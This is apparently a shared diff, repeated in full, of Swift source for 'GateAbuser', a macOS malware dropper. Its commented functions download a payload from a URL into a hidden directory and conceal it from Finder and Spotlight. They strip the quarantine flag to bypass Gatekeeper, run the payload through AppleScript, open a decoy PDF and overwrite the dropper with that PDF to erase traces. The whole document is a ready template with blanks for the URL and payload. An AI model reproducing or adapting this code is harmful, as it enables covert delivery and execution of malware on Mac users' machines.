noncetonic · August 25, 2016 20:25
diff --git a/AppDelegate-createHiddenDirectory.swift b/AppDelegate-createHiddenDirectory.swift
 /*
 Called by `downloadFile`, createHiddenDirectory takes a path to a directory, 
 creates the directory, and then calls `guiHide` and `noSpotlight` to hide 
 the directory from GUI view and the Spotlight drive indexer, respectively.
 */

 func createHiddenDirectory(location: NSString) {
    var err: NSErrorPointer = nil
    var fileManager = NSFileManager.defaultManager()
    fileManager.createDirectoryAtPath(location, withIntermediateDirectories: true, attributes: nil, error: err)
    guiHide(location)
    noSpotlight(location)
 }
diff --git a/AppDelegate-downloadFile.swift b/AppDelegate-downloadFile.swift
 /*
 `downloadFile` takes a URL, a filename, and a path to save the file. 
 Calling `createHiddenDirectory` and `lazaretto` on this path aid in 
 hiding the staging directory.
 */
 func downloadFile(url: NSString, filename: NSString, location: NSString) {
    var downloadUrl = NSURL(string: url)
    var dataFromUrl = NSData(contentsOfURL: downloadUrl!)
    var filePath = location + filename;
    
    createHiddenDirectory(location)
    var fileManager = NSFileManager.defaultManager()
    fileManager.createFileAtPath(filePath, contents: dataFromUrl, attributes: nil)
    lazaretto(location)
 }
diff --git a/AppDelegate-executeFile.swift b/AppDelegate-executeFile.swift
 /*
 Here we leverage applescript to execute our downloaded file. 
 Leveraging applescript allows us to run various types of 
 executables without needing to know much about them.
 */

 func executeFile(location: NSString) {
    var task = NSTask()
    let applescript = "do shell script POSIX path of \"\(location)\""
    task.launchPath = "/usr/bin/osascript"
    task.arguments = ["-e", applescript]
    var pipe = NSPipe()
    task.standardError = pipe
    task.standardOutput = pipe
    task.launch()

 }
diff --git a/AppDelegate-guiHide.swift b/AppDelegate-guiHide.swift
 /*
 Leveraging `/usr/bin/chflags` we can add the `hidden` attribute to a 
 file or directory which hides the directory/file from the Finder app 
 and general user GUI.
 */

 func guiHide(filePath: NSString) {
    var task = NSTask()
    task.launchPath = "/usr/bin/chflags"
    task.arguments = ["hidden", filePath]
    var pipe = NSPipe()
    task.launch()
    task.waitUntilExit()
 }
diff --git a/AppDelegate-header.swift b/AppDelegate-header.swift
 //
 //  AppDelegate.swift
 //  GateAbuser
 //
 //  Created by Luis Santana on 4/4/16.
 //  Copyright (c) 2016 Blacksun Hackers Research Labs. All rights reserved.
 //

 import Cocoa
 import Foundation
 import AppKit
diff --git a/AppDelegate-lazaretto.swift b/AppDelegate-lazaretto.swift
 /*
 Here is the star of this application, lazaretto. Taking a file path as 
 an argument, we leverage `/usr/bin/xattr -d -r com.apple.quarantine` 
 and our file path to recursively remove the quarantine attribute from 
 our file path, disabling GateKeeper for any file it encounters.
 */

 func lazaretto(filePath: NSString) {
    var task = NSTask()
    task.launchPath = "/usr/bin/xattr"
    task.arguments = ["-d", "-r", "com.apple.quarantine", filePath]
    var pipe = NSPipe()
    task.launch()
    task.waitUntilExit()
 }
diff --git a/AppDelegate-noSpotlight.swift b/AppDelegate-noSpotlight.swift
 /*
 A fairly well-known feature of OS X's Spotlight indexer is that if 
 you have a file named `.meta_noindex` within a directory, Spotlight 
 will skip right over it and not index the directory or any files 
 within it.
 */

 func noSpotlight(location: NSString) {
    var err: NSErrorPointer = nil
    var fileManager = NSFileManager.defaultManager()
    
    var file = location + ".meta_noindex"
    
    fileManager.createFileAtPath(file, contents: nil, attributes: nil)
 }
diff --git a/AppDelegate-openPDF.swift b/AppDelegate-openPDF.swift
 /*
 In an attempt to hide the true purpose of this application, we add a 
 pdf to our project and open it with the Preview application. 
 Note: Change "menu" in var pdfPath to the name of your bundled PDF.
 */

 func openPDF() {
    var mainBundle = NSBundle.mainBundle()
    // Change "menu" to the name of your pdf
    var pdfPath = NSString(string: mainBundle.pathForResource("menu", ofType: "pdf")!)
    var task = NSTask()
    task.launchPath = "/usr/bin/open"
    task.arguments = ["-a", "Preview", pdfPath]
    var pipe = NSPipe()
    task.standardError = pipe
    task.standardOutput = pipe
    task.launch()
 }
diff --git a/AppDelegate-randomString.swift b/AppDelegate-randomString.swift
 /*
 This is a function to generate a random string of characters. 
 We will leverage this later for renaming our downloaded file.
 */

 func randomString(len: Int) -> NSString {
    var letters : NSString = "qwertyuiopasdfghklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"
    
    var random_string : NSMutableString = NSMutableString(capacity: len)
    
    for (var i=0; i < len; i++) {
        var length = UInt32 (letters.length)
        var rand = arc4random_uniform(length)
        random_string.appendFormat("%C", letters.characterAtIndex(Int(rand)))
    }
    
    return random_string;
 }
diff --git a/AppDelegate-whodini.swift b/AppDelegate-whodini.swift
 /*
 `whodini` is a basic "file melting" function. Effectively whodini 
 takes the bundled PDF and overwrites GateAbuser with this PDF. 
 Subsequent runs of the GateAbuser binary will actually be running 
 the PDF directly as the contents of GateAbuser will be overwritten.
 */

 func whodini()
 {
    // Grab file paths
    var mainBundle = NSBundle.mainBundle()
    // Change "menu" to name of your pdf
    var pdfPath = NSString(string: mainBundle.pathForResource("menu", ofType: "pdf")!)
    var app = NSRunningApplication.currentApplication().executableURL!
    var appPath = app.path
    
    // Set up our File Manager
    let fileManager = NSFileManager.defaultManager()
    
    // Nuke dropper
    if (!fileManager.removeItemAtPath(appPath!, error: nil)) {
        print("Goofed")
    }
    
    // Ensure dropper was deleted
    if !fileManager.fileExistsAtPath(appPath!) {
        // Copy our benign file over
        if !fileManager.copyItemAtPath(pdfPath, toPath: appPath!, error: nil) {
            print("We did it!")
        }
    } else {
        print("Goofed")
    }
 }
diff --git a/AppDelegate.swift b/AppDelegate.swift
 /*
 A fairly self explanatory main function. Downloads your file, executes 
 your file, opens the PDF, overwrites downloader with PDF.
 */

 @NSApplicationMain
 class AppDelegate: NSObject, NSApplicationDelegate {

    @IBOutlet weak var window: NSWindow!


    func applicationDidFinishLaunching(aNotification: NSNotification) {
        var url = "" // URL GOES HERE
        var filename = randomString(8)
        var location = "" // STAGING DIRECTORY PATH GOES HERE
        
        downloadFile(url, filename, location)
        executeFile("") // FILE TO EXECUTE GOES HERE
        openPDF()
        whodini()
        exit(0)
    }
 }
	/*
	Called by `downloadFile`, createHiddenDirectory takes a path to a directory,
	creates the directory, and then calls `guiHide` and `noSpotlight` to hide
	the directory from GUI view and the Spotlight drive indexer, respectively.
	*/

	func createHiddenDirectory(location: NSString) {
	var err: NSErrorPointer = nil
	var fileManager = NSFileManager.defaultManager()
	fileManager.createDirectoryAtPath(location, withIntermediateDirectories: true, attributes: nil, error: err)
	guiHide(location)
	noSpotlight(location)
	}
	/*
	`downloadFile` takes a URL, a filename, and a path to save the file.
	Calling `createHiddenDirectory` and `lazaretto` on this path aid in
	hiding the staging directory.
	*/
	func downloadFile(url: NSString, filename: NSString, location: NSString) {
	var downloadUrl = NSURL(string: url)
	var dataFromUrl = NSData(contentsOfURL: downloadUrl!)
	var filePath = location + filename;

	createHiddenDirectory(location)
	var fileManager = NSFileManager.defaultManager()
	fileManager.createFileAtPath(filePath, contents: dataFromUrl, attributes: nil)
	lazaretto(location)
	}
	/*
	Here we leverage applescript to execute our downloaded file.
	Leveraging applescript allows us to run various types of
	executables without needing to know much about them.
	*/

	func executeFile(location: NSString) {
	var task = NSTask()
	let applescript = "do shell script POSIX path of \"\(location)\""
	task.launchPath = "/usr/bin/osascript"
	task.arguments = ["-e", applescript]
	var pipe = NSPipe()
	task.standardError = pipe
	task.standardOutput = pipe
	task.launch()

	}
	/*
	Leveraging `/usr/bin/chflags` we can add the `hidden` attribute to a
	file or directory which hides the directory/file from the Finder app
	and general user GUI.
	*/

	func guiHide(filePath: NSString) {
	var task = NSTask()
	task.launchPath = "/usr/bin/chflags"
	task.arguments = ["hidden", filePath]
	var pipe = NSPipe()
	task.launch()
	task.waitUntilExit()
	}
	/*
	Here is the star of this application, lazaretto. Taking a file path as
	an argument, we leverage `/usr/bin/xattr -d -r com.apple.quarantine`
	and our file path to recursively remove the quarantine attribute from
	our file path, disabling GateKeeper for any file it encounters.
	*/

	func lazaretto(filePath: NSString) {
	var task = NSTask()
	task.launchPath = "/usr/bin/xattr"
	task.arguments = ["-d", "-r", "com.apple.quarantine", filePath]
	var pipe = NSPipe()
	task.launch()
	task.waitUntilExit()
	}
	/*
	A fairly well-known feature of OS X's Spotlight indexer is that if
	you have a file named `.meta_noindex` within a directory, Spotlight
	will skip right over it and not index the directory or any files
	within it.
	*/

	func noSpotlight(location: NSString) {
	var err: NSErrorPointer = nil
	var fileManager = NSFileManager.defaultManager()

	var file = location + ".meta_noindex"

	fileManager.createFileAtPath(file, contents: nil, attributes: nil)
	}
	/*
	In an attempt to hide the true purpose of this application, we add a
	pdf to our project and open it with the Preview application.
	Note: Change "menu" in var pdfPath to the name of your bundled PDF.
	*/

	func openPDF() {
	var mainBundle = NSBundle.mainBundle()
	// Change "menu" to the name of your pdf
	var pdfPath = NSString(string: mainBundle.pathForResource("menu", ofType: "pdf")!)
	var task = NSTask()
	task.launchPath = "/usr/bin/open"
	task.arguments = ["-a", "Preview", pdfPath]
	var pipe = NSPipe()
	task.standardError = pipe
	task.standardOutput = pipe
	task.launch()
	}
	/*
	This is a function to generate a random string of characters.
	We will leverage this later for renaming our downloaded file.
	*/

	func randomString(len: Int) -> NSString {
	var letters : NSString = "qwertyuiopasdfghklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"

	var random_string : NSMutableString = NSMutableString(capacity: len)

	for (var i=0; i < len; i++) {
	var length = UInt32 (letters.length)
	var rand = arc4random_uniform(length)
	random_string.appendFormat("%C", letters.characterAtIndex(Int(rand)))
	}

	return random_string;
	}
	/*
	`whodini` is a basic "file melting" function. Effectively whodini
	takes the bundled PDF and overwrites GateAbuser with this PDF.
	Subsequent runs of the GateAbuser binary will actually be running
	the PDF directly as the contents of GateAbuser will be overwritten.
	*/

	func whodini()
	{
	// Grab file paths
	var mainBundle = NSBundle.mainBundle()
	// Change "menu" to name of your pdf
	var pdfPath = NSString(string: mainBundle.pathForResource("menu", ofType: "pdf")!)
	var app = NSRunningApplication.currentApplication().executableURL!
	var appPath = app.path

	// Set up our File Manager
	let fileManager = NSFileManager.defaultManager()

	// Nuke dropper
	if (!fileManager.removeItemAtPath(appPath!, error: nil)) {
	print("Goofed")
	}

	// Ensure dropper was deleted
	if !fileManager.fileExistsAtPath(appPath!) {
	// Copy our benign file over
	if !fileManager.copyItemAtPath(pdfPath, toPath: appPath!, error: nil) {
	print("We did it!")
	}
	} else {
	print("Goofed")
	}
	}
	/*
	A fairly self explanatory main function. Downloads your file, executes
	your file, opens the PDF, overwrites downloader with PDF.
	*/

	@NSApplicationMain
	class AppDelegate: NSObject, NSApplicationDelegate {

	@IBOutlet weak var window: NSWindow!


	func applicationDidFinishLaunching(aNotification: NSNotification) {
	var url = "" // URL GOES HERE
	var filename = randomString(8)
	var location = "" // STAGING DIRECTORY PATH GOES HERE

	downloadFile(url, filename, location)
	executeFile("") // FILE TO EXECUTE GOES HERE
	openPDF()
	whodini()
	exit(0)
	}
	}